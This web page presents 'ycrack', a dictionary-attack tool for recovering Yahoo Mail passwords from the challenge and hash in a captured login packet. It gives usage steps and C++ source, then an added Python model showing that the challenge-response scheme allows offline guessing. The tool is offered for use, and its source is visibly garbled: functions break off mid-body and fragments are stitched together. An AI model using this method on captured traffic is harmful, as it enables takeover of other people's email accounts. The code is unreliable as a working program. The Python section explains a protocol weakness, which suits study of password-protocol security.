ycrack is a dictionary attack tool designed specifically for testing the strength of Yahoo Mail passwords. You must know both the hashed password and the challenge text (both contained in the authentication packet sent to the server) in order to use the program.
Usage of the program is:
#./ycrack <hashed password> <challenge text> <word list file>
Below is an example login packet. Note the strings following 'challenge=' and 'passwd='; those are what you are looking for.
The file english_list.txt is the dictionary (a text file with one word per line).
This program compiles on both Linux and Microsoft Windows platforms.
Tool's Source Code:
/* I'm not the best programmer, and I know this is a bit sloppy, but it works. Feel free to modify/optimize/do whatever you want
* with this code, just give me credit if it is due.
*
* Description:
* ycrack performs a dictionary attack on hashed Yahoo mail passwords. See the readme file for more information on Yahoo's
* implementation of the MD5 hashing algorithm. Standard MD5 functions are from RSA Data Security.
*
* Usage:
* #./ycrack <hashed password> <challenge text> <word list file>
*
* Compilation:
* Compiles on both Linux and Windows platforms (tested on Windows XP and Linux 2.4.21)
* #g++ ycrack.cpp -o ycrack
*
* Craig Heffner
* (03/06/05)
*/
/////////////////////////////////////////////////////////////////////////
//
// Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
// rights reserved.
//
// License to copy and use this software is granted provided that it
// is identified as the "RSA Data Security, Inc. MD5 Message-Digest
// Algorithm" in all material mentioning or referencing this software
// or this function.
// License is also granted to make and use derivative works provided
// that such works are identified as "derived from the RSA Data
// Security, Inc. MD5 Message-Digest Algorithm" in all material
// mentioning or referencing the derived work.
// RSA Data Security, Inc. makes no representations concerning either
// the merchantability of this software or the suitability of this
// software for any particular purpose. It is provided "as is"
// without express or implied warranty of any kind.
// These notices must be retained in any copies of any part of this
// documentation and/or software.
/////////////////////////////////////////////////////////////////////////
// MD5String: Performs the MD5 algorithm on a char* string, returning
// the results as a char*.
char* MD5String(char* szString)
{
int nLen = strlen(szString);
md5 alg;
// md5::Transform
// MD5 basic transformation. Transforms state based on block.
void md5::Transform (uchar* block)
{
uint4 a = m_State[0], b = m_State[1], c = m_State[2], d = m_State[3], x[16];
    crypt=argv[1];      //password hash
    challenge=argv[2];  //challenge text
    file=argv[3];       //word file
    FILE *f;
    f=fopen(file,"r");  //open word list
    if(!f){printf("\nError opening file %s\n",file);return 0;}
    //read each word into 'test'; the loop ends as soon as fscanf stops returning a word,
    //so the last word is not tried a second time at End Of File
    //(%s is unbounded: 'test' must be large enough for the longest line in the word list)
    while(fscanf(f,"%s",test)==1){
        string=test;
        printf("Trying:%s\n",string);
        hash1=MD5String(string);          //get MD5 hash of the password
        memcpy(&stuff[0],hash1,32);       //copy the hashed password into stuff
        memcpy(&stuff[32],challenge,28);  //append challenge text (assumed to be 28 characters) onto the end of the password hash
        stuff[60]='\0';                   //terminate the 60-character string; memcpy does not add a terminator
        hash2=MD5String(stuff);           //calculate final hash
        if(strcmp(crypt,hash2)==0){       //compare hash2 to the captured hash
            printf("\nThe Yahoo password is: %s\n",string);
            fclose(f);
            return 0;
        }
    }
    fclose(f);
    printf("\nPassword not found!\n");
    return 0;
}
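The exchange that the code above relies on, shown from both sides as an added example (not part of ycrack or of the original page): the single-use challenge blocks replay of a captured response, yet anyone holding the challenge and response from one login packet can still check a password guess offline, so the strength of the password is the only protection. The Server class, the account name, the sample password, and the assumptions that the server stores the lowercase hex MD5 of the password and that MD5String returns lowercase hex are hypothetical.

```python
import hashlib
import hmac
import secrets

def md5_hex(text: str) -> str:
    # Lowercase 32-character hex digest (assumed to match MD5String's output).
    return hashlib.md5(text.encode("utf-8")).hexdigest()

def client_response(password: str, challenge: str) -> str:
    # MD5( hex(MD5(password)) + challenge ), the value ycrack compares against.
    return md5_hex(md5_hex(password) + challenge)

class Server:
    """Hypothetical server that stores only hex(MD5(password)) per account."""

    def __init__(self):
        self.stored = {}   # user -> hex MD5 of the password
        self.pending = {}  # user -> challenge issued and not yet used

    def register(self, user: str, password: str) -> None:
        self.stored[user] = md5_hex(password)

    def new_challenge(self, user: str) -> str:
        # 28 characters: the fixed length ycrack copies from its argument.
        self.pending[user] = secrets.token_hex(14)
        return self.pending[user]

    def verify(self, user: str, response: str) -> bool:
        challenge = self.pending.pop(user, None)  # single use: blocks replay
        if challenge is None or user not in self.stored:
            return False
        expected = md5_hex(self.stored[user] + challenge)
        return hmac.compare_digest(expected, response)

def observer_can_test(guess: str, challenge: str, response: str) -> bool:
    # Challenge and response travel in the same packet, so whoever captures
    # it can check a guess offline at a cost of two MD5 calls.
    return hmac.compare_digest(client_response(guess, challenge), response)

if __name__ == "__main__":
    srv = Server()
    srv.register("alice", "sunshine")  # constructed sample account
    ch = srv.new_challenge("alice")
    resp = client_response("sunshine", ch)
    print("server accepts login:  ", srv.verify("alice", resp))
    print("replayed response:     ", srv.verify("alice", resp))
    print("observer checks guess: ", observer_can_test("sunshine", ch, resp))
```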